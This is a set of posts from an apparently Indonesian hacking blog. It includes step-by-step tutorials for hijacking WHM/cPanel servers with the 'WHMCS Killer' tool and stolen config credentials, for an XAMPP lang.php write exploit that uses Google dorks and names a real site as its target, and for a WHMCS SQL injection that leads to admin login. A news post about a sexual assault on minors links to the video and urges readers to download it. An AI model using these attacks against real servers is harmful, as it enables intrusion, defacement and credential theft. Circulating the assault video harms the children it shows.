Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Sebenarnya ini tutorial lama sih. Di google juga sudah banyak tersebar :D . tapi siapa tau ada yang belum bisa. jadi sekalian share di blog sederhana saya ini :) . Oke langsung saja.

Sebelumnya, sobat harus punya WHMCS Killer nya. kalo belum punya, silahkan download di :

Download WHMCS Killer V3

Langsung ke langkah-langkah :

Pertama, sobat harus dapetin dulu config WHMCS nya. Entah dengan cara symlink atau cara apa :D

Contoh Config WHMCS

Contoh Config WHMCS :



<?php

$license = 'Owned-fgdfffgtyrydfd6c8c3d';



$db_host = 'localhost';

$db_username = 'serverasd_usr';

$db_password = 'KjlKuItsdf';

$db_name = 'serverasd_whmcs';

$cc_encryption_hash = '6mnWFdQMWlmRJsJaxih007Hr9KCwxTRu54gB8WdV7qCHIbI6kPXaMurM5U8tDPNz';

$templates_compiledir = 'templates_c/';

$mysql_charset = 'utf8';

?>



Setelah itu, upload WHMCS Killer di webnya :D

Tinggal diisni kolom kolomnya sesuai dengan yang tertera di file config tadi :D

lalu kilk submit....

naih sudah masuk. kalo sudah gitu ya terserah mau diapain :p

kalo mau lihat password sama user WHM ya tinggal klik menu H0st R00ts

User and Password WHM :p

Atau kalo mau ngurut urut cPanel nya tinggal klik menu Clients hosting Account :D

Sekian postingan sederhana dari saya, semoga bermanfaat :)

Selamat Hari Blogger Nasional

Tadi baca-baca di Google nemu artikel yang cukup menarik, ya hari ini 27 Oktober ternyata ditetapkan sebagai hari Blogger Nasional. saya tentu sebagai seorang blogger (pemula) juga ingin mengucapkan SELAMAT HARI BLOGGER kepada seluruh blogger di Indonesia.

Selamat hari Blogger Indonesia...

Maju terus para blogger Indonesia.

Terus hadirkan karya-karya menarik dan tunjukkan bahwa anak blogger adalah anak yang kreatif :D



Salam Blogger :)

Seks Murid SMPN 4 Jakarta Dilakukan Tiga Kali di Kelas

Dalam tiga hari terakhir ini memang sedang panas panasnya pemberitaan tentang pencabulan yang dilakukan oleh sepasang siswa dari SMPN 4 Jakarta. namun tahukah anda, bahwa sebenarnya hal tersebut bukan sekali itu saja terjadi ? Dan menurut laporan orangtua pemeran bokep 3gp ecek-ecek tersebut anaknya melakukan adegan anu tersebut karena dipaksa.



Dalam waktu dekat ini penyidik akan memeriksa dua pelaku dalam kasus rekaman video mesum di Sekolah Menengah Pertama (SMP) 4 Jakarta Pusat, yakni AE dan FP.



Kabid Humas Polda Metro Jaya, Kombes Pol Rikwanto, Rabu (23/10/2013) malam mengatakan, penyidik berhasil berkomunikasi dengan pelaku tersebut yang sebelumnya sempat menghilang.

AE merupakan pemeran perempuan kelas 9 sementara FP merupakan pemeran laki-laki kelas 10. Rencananya besok atau lusa penyidik akan memeriksa keduanya untuk dimintai keterangan.



"Ada komunikasi dengan AE dan FP mereka sekarang ada di suatu tempat dan kemungkinan akan diperiksa antara besok atau lusa," tegas Rikwanto, Kamis (24/10/2013) di Mapolda Metro Jaya.



Rikwanto menuturkan saat ini penyidik belum menyimpulkan apakah ada pelanggaran hukum atau tidak dalam kasus tersebut. Untuk itulah dilakukan pemeriksaan terhadap kedua pelaku untuk mengetahui peristiwa sebenarnya.

"Penyidik lakukan pemeriksaan dulu pada keduanya. Belum diketahui ada pelanggaran hukum atau tidak. Karena kan ada yang bilang dipaksa, bulliying dan suka sama suka," ujar Rikwanto.



Rikwanto menambahkan saat ini penyidik sudah memeriksa 17 orang saksi yakni 10 siswa yang nonton dan merekam, empat pihak sekolah dan tiga penjaga sekolah.



Seperti diberitakan sebelumnya, orangtua AE, siswi salah SMP 4 di Jakarta Pusat, melaporkan bahwa anaknya dipaksa melakukan oral seks dengan adik kelasnya FP sembari direkam oleh teman-temannya dengan ancaman senjata tajam, pada Jumat (13/10/2013).

Berdasarkan keterangan ortu AE, kronologi kejadian berawal ketika AE diajak temannya berinisial A untuk bertemu dengan teman lainnya berinisial CN, CD, DN, IV, dan WW, di salah satu ruang kelas, pada saat pelajaran sekolah usai. Namun ketika korban masuk kelas, selain ada teman-temannya, ternyata ada juga adik kelas mereka berinisial FP.

Kemudian A menyuruh AE melakukan oral seks kepada FP. Sementara, teman-teman lainnya menyaksikan. Bahkan ada yang merekam menggunakan video telepon seluler. Saat melakukan itu, menurut Ortu AE, anaknya diancam menggunakan senjata tajam jenis pisau.



Rikwanto menyampaikan, sejumlah siswa memang telah membuat rencana, bahwa setelah pelajaran sekolah rampung, mereka mencari kelas yang kosong dan melakukan perbuatan itu.



Bahkan, kata Rikwanto, hal ini sudah dilakukan para siswa itu terhadap AE sebanyak 3 kali. "Setelah sekolah bubar dan murid-murid lainnya pulang, mereka tetap tinggal di tempat dan mencari kelas yang kosong. Itu sudah dilakukan tiga kali dalam kurun waktu yang berbeda," ungkap Rikwanto.



Terakhir, tambah Rikwanto, dilakukan pada 9 Oktober, dengan kelompok yang sama dan pemeran yang sama.



Oh iya, bagi yang belum lihat videonya, bisa dilihat di :

Youtube Video Bokep Ecek-Ecek :p



saran saya sih mending didownload aja videonya, keburu dihapus soalnya tuh video frontal banget :v

Install Blackberry Messenger (BBM) Di PC / Laptop

Assalamualikum.... Setelah diluncurkannya aplikasi messenger besutan RIM Motion yaitu Blackberry Messenger untuk Android dan iOS beberapa waktu yang lalu membuat aplikasi ini menjadi sangat didambakan para jejaring sosial, mengingat aplikasi messenger ini merupakan yang paling terlaris dan paling banyak penggunanya yang terhubung hanya melalui perangkat Blackberry saja. Saat ini semua pengguna Android dan iOS telah bisa menikmati aplikasi tersebut dengan Gratis. tapi tidak semua OS Android compatible untuk dipasangkan dengan BBM, syaratnya minimal smartphone yang menggunakan Android 4.0 Icecream Sandwich. Nah, bagaimana kalau Smartphone sobat tidak memenuhi persyaratan yg ditentukan? tidak perlu bersedih hati, karena sobat bisa mencicipi BBM tersebut melalui komputer maupun laptop dengan memanfaatkan software virtual. silahkan disimak aja :)

INSTALL BBM DI PC ALL IN ONE

Ada beberapa cara yang bisa sobat lakukan untuk menggunakan aplikasi BBM menggunakan PC / Laptop yaitu bisa menggunakan Bluestacks, Android SDK, Genymotion, Jar of Beans dan Virtualbox. disini saya sajikan semuanya secara lengkap. Silahkna disimak aja :)

CARA PERTAMA MENGGUNAKAN BLUESTACKS 

 Status : Tested & Work!!

(Klik Disini untuk informasi selanjutnya)

CARA PERTAMA MENGGUNAKAN JAR OF BEANS

Status : Tested & Work  

(Klik Disini untuk informasi selanjutnya) 

CARA KETIGA MENGGUNAKAN ANDROID SDK

Status : Tested & Work for All OS Tanpa ada Masalah!!!!
Specifikasi : Acer Intel Core i3, RAM 2GB, VGA Intel HD

Sediakan peralatan yang diperlukan:

1. Laptop / PC | Belii :p

2. Android SDK | Download

3. Java SE Development Kit 7u45 - Windows x86 | Download

4. Blackbery Messenger | Download

5. ID Blackberry | Register here

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Langkah - Langkah

Pertama silahkan daftarkan dulu ID blackberry untuk memudahkan proses instalasi aplikasi BBMannya :)

Kemudian donlot peralatan yang dibutuhkan, install Java dulu yah biar bisa jalan. kemudian extrack Android SDK di partisi yg diinginkan,, kalo saya sendiri file diletakkan di partisi E:/

Kemudian buka file SDK Manager, Lalu klik Tools > Manage AVD'> klik New

Setting aja sesuai keinginan, klo ga tau boleh niru punya saya :D Klik OK

Nah, proses pengaturan selesai. kalo ceklis hijau, berarti tidak ada yg salah dalam pengaturan tadi. lalu klik Start

Nah, Androidnya udah bisa jalan :)

Trus bagaimana install BBM.apk nya??? sobat bisa mendownloadya dari Browser Android emulator sobat, download aja dari lik yg ada diblog ini.. kemudian diinstall.

Bisa juga secara secara manual yaitu  tinggal copy dan pastekan ke folder platform-tools. kemudian buka terminal dan masuk ke path E:\Android-SDK\sdk\platform-tools, dan masukan perintah : adb.exe install bbm.apk Lihat gambar !!

Tunggu saja proses instalasinya hingga selesai, kalo udah selesai maka BBM akan muncul di menu android. Lihat gambar!!

Nah, udah selesai tinggal dibuka aplikasinya :)

lalu masukkan email sobat yang telah terdaftar di Blackcerry ID

Selanjutnya klik Next aja

Kemudian silahkan Sign in menggunakan akun ID yang terdaftar di Blackberry

Kemudian isi form yg ada sesuai keinginan. lalu klik Submit

Nah, tinggal menunggu proses validasi selesai

Setelesah selesai, maka sobat akan mendapatkan PIN nya.. Jangan lupa Invite saya yah :D

Tambahan :

Karena saya lagi males mo ngapa2in, jadi saya copas aja yg ada digruop Dari Sobat Galih, yaitu Cara mindahin Foto dari Harddisk ke Gallery (Emulator) Khusus Android SDK :

1. Masuk ke folder sdk => \sdk\tools
2. Open monitor.bat
3. Pilih Device
4. File Explorer [Digambar Kebalik]
5. Storenge => sdcard [Digambar Kebalik] (Ingat save di folder sdcard, jangan di folder Picture)
6. Klik nomor enam (Lihat Gambar!)
7. Pilih file dari harddisk yang akan disimpan di sdcard (Satu-satu)
8. Sekarang lihat Gallery di android (emulator) sobat !


CARA KEEMPAT MENGGUNAKAN GENYMOTION 

Status : Tested & Work for All OS Tanpa ada Masalah!!!!
Specifikasi : Acer Intel Core i3, RAM 2GB, VGA Intel HD

Sediakan peralatan yang diperlukan:

1. Laptop / PC | Belii :p

2. Genymotion-1.3.0-Vbox | Register & Download

3. Blackbery Messenger | Download

4. ID Blackberry | Register here

Langkah - Langkah

Pertama sobat diharuskan mendaftar di Genymotion, untuk mendownload Installernya. kalo sudah donlot silahkan diinstall sekalian virtualboxnya yg udah satu paket dengan genymotion. kalo sudah selesai semua tinggal dibuka ajaa plikasinya. kemudian Klik ADD lalu masukkan username dan passwor yg udah sobat daftarkan tadi. klik Connect

Lalu pilih Virtual Device sesuai keinginan. saran ane pilih yg specnya yg rendah aja  biar ga berat dan yang udah bundle Gapps,. lalu klik Add

Setelah itu klik Next untuk mendownload virtuallnnya.  tunggu aja ampe selesai :)

Kalo sudah selesai download, klik aja Play

Lalu untuk install BBMnya bisa sobat download melalui Playstore maupun di Blog IDCA :)





CARA KELIMA MENGGUNAKAN VIRTUALBOX

Status : Tested & Work on Windows 8 & Linux Ubuntu tapi Sedikit bermasalah!!!!!!!!!!
Specifikasi : Acer Intel Core i3, RAM 2GB, VGA Intel HD


Sediakan bahan-bahan yang diperlukan:

1. Virtualbox v.4.3-x86/amd64 | Download

2. OS Android 4.1 JellyBean | Download

3. ID Blackberry | Register here

4. Blackbery Messenger | Download

Langkah - Langkah

Pertama silahkan daftarkan dulu ID blackberry untuk memudahkan proses instalasi aplikasi BBMannya :)

Kemudian install Androidnya di virtualbox. bagi yang belum tau caranya, silahkan lihat : Cara Install Android Di Virtualbox.

Setelah itu copy BBM.apk melalui flashdisk ke virtual Android yang sudah diinstal tadi. caranya coopy dulu file BBM.apk ke flashdisk, lalu di virtual klik Device > Mass Setorage Device. tunggu proses pembacaan flashdisk hingga selesai.

Lalu ubah Settingan agar Androidnya bisa diinstall aplikasi dari luar Playstore. caranya klik Setting > Security > ceklis Unknown Source.

Kemudian buka ASTRO, klik File Manager > klik UP > klik folder USB

Setelah itu double klik file BBM, lalu klik Install

Silahkan tunggu hingga proses instalasi selesai.

Kalo udah selesai, tinggal buka aja aplikasi BBMnya :) dan proses selanjutnya sama seperti proses diatas.

Sekian tutorial dari saya,kurang lebih mohon maaf dan "Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik 1x iklan yg berlabel Donasi.. Terimakasih " :)

Content Creator : Onix AQua

Nenek 75 Tahun ini Putuskan Koneksi Internet Dua Negara

Iseng iseng nyari artikel akhirnya ketemu artikel lama namun tetap menarik untuk dibagikan. Ya, seorang nenek 75 tahun tanpa sengaja memutuskan koneksi internet dua engara. Lah, kok bisa ? Berikut ulasannya.

Hayastan-Shakarian

Peristiwa unik terjadi di Georgia pada tahun 2012 lalu. Seorang nenek usia 75 tahun dinyatakan bertanggungjawab memutus koneksi internet di Georgia dan negara tetangganya, Armenia, sehingga banyak netter gagal berselancar di dunia maya.



Kementerian Dalam Negeri Georgia menyatakan wanita pensiunan itu awalnya menggali tanah untuk mencari besi atau benda yang bisa dijual. Nah, penggalian itu berujung pada kabel fiber optik yang mengalirkan koneksi internet di Georgia dan Armenia.



Tidak paham apa kegunaannya, sang nenek ini memotong dan merusak kabel tersebut. Maka putuslah koneksi internet di sebagian wilayah dua negara. Ribuan pengguna internet tak dapat mengakses internet selama beberapa jam.



"Ia menemukan kabel itu saat sedang mengumpulkan logam dan malah memotongnya dengan tujuan untuk mencuri," ucap Zura Gvenetadze, juru bicara Kementerian Dalam Negeri Georgia, dilansir AFP.



Nenek usil itu kini telah ditangkap dan terancam hukuman sampai 3 tahun penjara dengan dakwaan merusak properti. Sejatinya, peristiwa semacam ini pernah terjadi pada tahun 2009 di mana kabel fiber optik juga dirusak seseorang.



Namun kali ini, skalanya lebih besar. Perusahaan pemilik kabel, Georgian Railway Telecom, menyatakan bahwa kerusakan membuat 90% user internet biasa dan korporat di Armenia kehilangan akses selama 12 jam. Demikian juga penyedia layanan internet di Georgia jadi terganggu.



"Saya tak mengerti bagaimana nenek ini bisa menemukan dan merusak kabel. Kabel itu terlindungi dan insiden semacam ini sangatlah langka," ucap Giorgio Ionatamishvili dari Georgian Railway Telecom.



Ini baru yang dinamakan HACKER :v

[ kaos IDCA Sesi ke-2 ]

Selamat siang sobat IDCA, akhirnya T-Shirt IDCA datang lagi huehehe, jika berminat silahkan pesan.
Kami memakai sistem PreOrder dimana kalian membayar dahulu baru nanti kalau sudah jadi baru bisa dikirim :)

TAMPILAN

KETERANGAN

Bahan Kain : Cotton Combed 30s

Sablon : Ruber Matsui

IDR : Rp. 75.000,- ( belum ongkos kirim )

Atau mau beli kaos yang lain ? silahkan kemarin ( DISINI )

Jika berminat memesan silahkan INBOX saya :)

Bimo Septiawan

XAMPP Write Access Vulnerability

Bismillahirrahmanirrahiim,

Sebelumnya saya mohon maaf, berhubung saya lagi males jadi saya ngasi tutorial yg saya copas dari blognya om MR. Xenopobic :D Selengkapnya, biar ga bingung karena tanpa ada gambarnya,,, silahkan kunjungi aja ke blognya Disini

buka website target, dan masukkan exploit berikut :

/xampp/lang.php?Hacked+By+Nicknamemu

nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.

disini saya mendapatkan pesan error seperti ini :

lalu kita ganti "index.php" menjadi "lang.tmp"

selesai ^_^.

Sumber : Blognya Xenopobic :v

E-Book ASWB ( Attacking Side With Backtrack ) Versi Pertama

Judul : Attacking side with BackTrack ( ASWB )
Price : free
Versi : 1
Author : zee eichel, habibi rizqi rahmadhan, james0baster

Sinopsis : Buku ini mengajarkan tentang penggunaan BackTrack secara umum yang menitik beratkan pada penggunaan tools serta metodologi penetration testing itu sendiri. Buku ini di lengkapi dengan motivasi IT dari habibi rizky ( awaken the dragon within ). Buku ini sangat kami rekomendasikan untuk para pemula serta advance pengguna BackTrack di indonesia. Selain menggunakan bahasa Indonesia, buku ini juga dilengkapi dengan screenshot yang di harapkan dapat membantu pengertian para pengguna Backtrack di Indonesia

 

 

Terms of agreement

• Buku ini benar-benar bersifat free tanpa biaya sama sekali, di harapkan anda mendownload dari situs ini. Jika anda mendapati buku ini di perjual-belikan maka sebaiknya anda abaikan karena kami tidak bertanggung jawab atas setiap penyalahgunaan publishing buku ini secara menyeluruh
• Anda dapat menyebarluaskan buku ini , termasuk di antaranya me-reupload buku tersebut ke direktori atau ke resource server anda. Ini dapat anda lakukan dengan free namun dilarang untuk mengubah apapun setiap material buku tersebut termasuk di antaranya adalah informasi Author
• Buku ini dalam trade mark ( codewall-security ) dan memiliki nilai hukum dari segi HAKI  secara sah mengikuti hukum yang berlaku di republik Indonesia, barang siapa yang melakukan atau melanggar pernjanjian ini akan kami adakan tindakan hukum tanpa pemberitahuan terlebih dahulu.

Anda dapat mendownload buku ini melalui link di bawah ini
Download ASWB free ebook

1	Password RAR : fUcKlamerS

Sumber : IBTeam

Inilah Lima Hacker Cantik di Dunia

Hacker identik dengan pria. Ya, hacker-hacker terkenal rata-rata pria. namun tahukah anda bahwa tidak sedikit wanita yang ambil bagian di dunia underground ini. Dan kali ini saya akan mengulas Lima Hacker Cantik di Dunia.

Oke langsung saja.

Kristina Svechinskaya

Kristina Svechinskaya adalah seorang mahasiswi New York University yang ditahan pada 2 november 2010 lalu karena telah membobol jutaan dollar dari beberapa bank di Inggris dan Amerika. Bersama 9 orang lainya, Svechinskaya meng-hack ribuan rekening bank dan diperkirakan total fresh money yang telah digasaknya itu sekitar 3 juta dollar.



Svechinskaya beserta tim awalnya menargetkan jumlah uang yang dicurinya adalah sekitar 220 juta dollar. Svechinskaya menggunakan Zeus Trojan Horse untuk menyerang ribuan rekening bank. Dia memiliki setidaknya 5 rekening bank dunia untuk mencairkan dananya. Dalam aksinya itu, Svechinskaya juga melakukan pemalsuan paspor dan untuk itu total dia dituntut hukuman 40 tahun penjara bila terbukti bersalah. Seperti dilihat di gambar, bra yang digunakan gadis cantik ini terbuat dari berlian. Svechinskaya juga mendapat julukan sebagai hacker terseksi di dunia. Ya, karena memang tampilan wajah, tatapan mata dan gaya berbusana Svechinskaya bisa membuat orang-orang tak berkedip.



Xiao Tian

Yang kedua adalah Xiao Tian. Teringat dengan kata hacker, biasanya yang terlintas di bayangan adalah seorang kutu buku dengan kaca mata tebal dengan gaya hidup yang acak-acakan. Tapi tidak berlaku untuk Xiao Tian. Dia adalah seorang hacker yang modis.Penampilan dan gaya hidupnya begitu rapi, dinamis bahkan terkesan feminim.



ia juga tertarik sekali dengan dunia fashion, khususnya sepatu. Dalam blog nya dia sering berbagi cerita tentang tempat-tempat yang pernah dia datangi. Itulah alasan mengapa Xiao memiliki banyak fans dan followers di dunia, khususnya para pria.

Xiao Tian, mulai dikenal sejak umur 19 tahun. Setelah membentuk China Girl Security Team, salah satu kelompok hacker khusus wanita terbesar di china. Kiprahnya dalam dunia hacking juga tidak diragukan lagi. Raksasa search engine nomor satu di dunia, Google pun pernah merasakan serangan hebat dari Tian beserta timnya. Xiao Tian melakukan serangan canggih terhadap sistem infrastruktur google china. Bahkan, google akhirnya tidak tahan dan memilih untuk menarik semua layanan operasionalnya di China akibat hantaman hacker yang bertubi-tubi tersebut.



Ying Cracker

Ying Cracker, begitulah dia biasa dipanggil. Hacker cantik ini seorang pengajar dari shanghai Cina. Dia mengajar tentang panduan dasar proses hacking, cara merubah IP address atau memanipulasi password kantor ! Dia juga ahli dalam membuat tools hacking.



Dalam sebuah forum yang berjudul Chinese Hottie Hackers, namanya banyak dibahas dan itu membuat popularitasnya semakin menanjak. Dalam forum tersebut juga dia mempunyai anggota fans yang cukup banyak. Disitulah awal kredibilitasnya melambung.



Joanna Rutkowska

Joanna Rutkowska adalah seorang wanita polandia yang tertarik dengan dunia hacking security. Namanya pertama kali dikenal setelah konferensi Black Hat Briefings di Las Vegas, agustus 2006. Dimana saat itu Rutkowska mempresentasikan proses serangan yang telah dia lakukan terhadap sistem keamanan windows vista. Tidak hanya itu, Rutkowska juga pernah menyerang Trusted Execution Technology dan System Management Mode milik Intel.



Awal 2007 dia membentuk Invisible Things Lab di Warsawa, Polandia. Sebuah perusahaan yang berfokus terhadap research keamanan OS juga VMM serta layanan konsultasi keamanan internet. Tahun 2010 juga Rutkowska bersama Rafal Wojtczuk membentuk Qubes, sebuah Operating System yang sangat full protect security. Rutkowska juga pernah memberikan saran terbuka untuk Vice President of Microsoft Security Technology Unit untuk lebih memperketat sistem keamanan dalam windows vista.



Raven Adler

Di urutan terakhir, kita punya Raven Adler. Seorang wanita berpenampilan gothic yang tertarik dengan dunia internet, khususnya dunia hacking. Raven adalah wanita pertama yang pernah hadir dalam konferensi hacker DefCon. Perhatian konferens tentu saja tertuju penuh untuknya. Tapi dia mengaku tidak ingin memanfaatkan gender nya sebagai wanita untuk mendongkrak kredibilitasnya sebagai hacker. Dalam banyak kesempatan pula, dia tidak begitu senang dipanggil dengan sebutan �Hacker Wanita�. Dia lebih senang dipandang karena skill nya, bukan karena posisinya yang spesial sebagai seorang wanita.



Saat ini dia aktif mendesign, menguji dan mengaudit sistem detektor keamanan untuk berbagai agen-agen federal besar. Selain itu, di sela-sela kesibukanya dia juga telaten mempelajari ilmu beladiri Ryu Shorin Matsumura.



Diantara kelima hacker diatas, siapa yang paling cantik menurut anda ? :D

XAMPP All Version Local Write Access Vulnerability

Kali ini saya akan share salah satu exploit yang mungkin tergolong mudah untuk dipraktekkan. XAMPP All Version Local Write Access Vulnerability. Oke langsung saja ya. Ini exploit lagi rame sekarang :D

Google Dork :

inurl:/xampp/lang.php

inurl:/security/lang.php

Use your brain :p



Exploit :

http://localhost/[path]/xampp/lang.php?WriteIntoLocalDisk

http://localhost/[path]/security/lang.php?WriteIntoLocalDisk



Langkah langkah :

Mulai berselancardi google dan cari target .

Contoh : http://www.aquadivarigotti.it/security/lang.php

Tinggal masukkan exploitnya, contohnya menajdi http://www.aquadivarigotti.it/security/lang.php?hacked_by_Nabilaholic404



Hasilnya terletak di http://localhost/[path]/xampp/lang.tmp atau http://localhost/[path]/security/lang.tmp



Contoh

http://www.aquadivarigotti.it/security/lang.tmp

Mirror


http://www.zone-h.org/mirror/id/20996159



Sekian tutorial kali ini, semoga bermanfaat :)

Tutorial Exploit WHMCS 5.2.7 SQL Injection

Assalamualaikum...

Sebelumnya saya sudah pernah membahas tentang Hack WHM, dan tutorial kali ini kita akan mengexploitasi bug yang terdapat pada web aplikasi WHMCS.. lalu pertanyaanya, apa bedanya WHM dan WHMCS??? Google sono :p :v

Thanks To : Mr. Xenophobic atas sumbangan targetnya untuk Tutorial ini :D
Dork :

intext:powered by whmcompletesolution

Pertama silahkan sobat mencari targetnya di google dengan memanfaatkan dork diatas.

Kemudian sobat diharuskan Register di web target.

Setelah Register, kita akan melakukan exploitasinya dengan menggunakan Exploiter berikut:
http://www.summer-radio.com/tmp/xe.php

Masukkan site target, email, dan password yg di daftarkan tadi, lalu klik Exploit!

Tunggu saja prosesnya, nanti akan muncul hasilnya :)

Setelah di dapat username,email, dan password admin, kemudian decrypt hashnya, utk decriptnya nya bisa sobat decrypt di md5decrypter.co.uk atau di web yang menyediakan service hash crack yang lain. ato bisa juga dengan Hashcat, dan lainnya yg udah dibahas diblog ini :)

Setelah password berhasil di decrypt, selanjutnya masuk ke halaman admin! contoh : http://site.com/whmcs/admin/login.php ), masukkan username & password admin dan login dah... setelah itu, terserah mo diapain... :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Content Creator : Onix AQua